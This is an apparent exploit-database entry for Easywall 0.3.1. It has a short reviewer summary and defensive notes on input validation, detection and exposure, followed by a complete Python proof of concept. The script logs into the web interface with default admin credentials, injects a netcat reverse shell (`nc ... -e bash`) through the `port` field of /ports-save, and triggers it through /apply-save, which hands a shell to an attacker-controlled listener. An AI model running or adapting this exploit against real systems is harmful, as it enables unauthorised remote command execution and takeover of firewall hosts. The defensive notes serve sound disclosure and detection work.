Easywall 0.3.1 Authenticated Remote Command Execution

2024.03.03
Credit: Melvin Mejia
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04
#
# Reviewer summary (CWE-78, OS command injection):
#   * Root cause as stated by the author: the `port` form field accepted by
#     POST /ports-save is not restricted to a port number, so shell
#     metacharacters in it reach a command line.
#   * The value is stored by /ports-save and only executed when the rule set
#     is applied through POST /apply-save, so the two requests appear as
#     separate events in web logs.
#   * A valid session is required (POST /login), hence "Authenticated".
#   * How Easywall builds the command internally is not shown on this page;
#     confirm against the project source before relying on details.
#
# Defensive notes:
#   * Fix: validate `port` server-side as an integer in 1-65535 (plus whatever
#     range syntax the application legitimately accepts) and pass it to the
#     firewall tooling as an argument list, never through a shell string.
#   * Detection: alert on /ports-save request bodies whose `port` value
#     contains anything other than the expected numeric syntax (for example
#     `;`, `#`, spaces or `/`), and on unexpected child processes or outbound
#     connections from the Easywall service account after /apply-save.
#   * Exposure: restrict the web UI to a management network and replace weak
#     administrator passwords, since the issue is only reachable after login.

import requests
import json
import urllib3

# Silences the urllib3 warnings that the verify=False requests below would
# otherwise print.
urllib3.disable_warnings()


def exploit():
    """Run the author's three-request proof of concept against one host.

    Sequence, as visible in the code:
      1. POST /login with a username and password to obtain a session.
      2. POST /ports-save with a `port` field that carries a shell command
         after a `;` separator.
      3. POST /apply-save, which the author states triggers execution of the
         stored value.

    Every failure path prints a message and terminates with exit status 1.
    All addresses and credentials are hard-coded sample values from the
    author's test setup.
    """
    # Replace values needed here
    target_host = "192.168.1.25"
    target_port = "12227"
    lhost = "192.168.1.10"
    lport = "9001"
    user = "admin"
    password = "admin"

    base_url = f"https://{target_host}:{target_port}"

    # Step 1: authenticate. verify=False turns off TLS certificate
    # validation (presumably because the test instance used a self-signed
    # certificate -- not stated on the page).
    print("[+] Attempting login with the provided credentials...")
    credentials = {"username": user, "password": password}
    http = requests.session()
    try:
        login_resp = http.post(f'{base_url}/login', data=credentials, verify=False)
    except Exception as err:
        print("[!] There was a problem connecting to the app, error:", err)
        exit(1)

    # Only the HTTP status is checked; the script treats any 200 as a
    # successful login.
    if login_resp.status_code != 200:
        print("[!] Login failed.")
        exit(1)
    print("[+] Login successfull.")

    # Step 2: the vulnerable input. "123" is the syntactically valid port,
    # `;` ends it, and the remainder is a second command. The trailing `#`
    # presumably comments out whatever the application appends after the
    # port value -- confirm against the Easywall source. A numeric-only
    # check on this field would reject the request outright.
    print("[+] Attempting to send payload.")
    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
    port_form = {
        "port": f"123;{rev_shell}",
        "description": "",
        "tcpudp": "tcp",
    }
    save_resp = http.post(f"{base_url}/ports-save", data=port_form, verify=False)
    if save_resp.status_code != 200:
        print("[!] Failed to send payload.")
        exit(1)
    print("[+] Payload sent.")

    # Step 3: applying the rule set is what causes the stored value to be
    # executed, per the author. This is the point at which process-creation
    # and network telemetry on the host would show the effect.
    print("[+] Attempting execution.")
    apply_form = {"step_1": "", "step_2": ""}
    apply_resp = http.post(f"{base_url}/apply-save", data=apply_form, verify=False)
    if apply_resp.status_code != 200:
        print("[!] Attempt to execute failed.")
        exit(1)
    print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")


exploit()

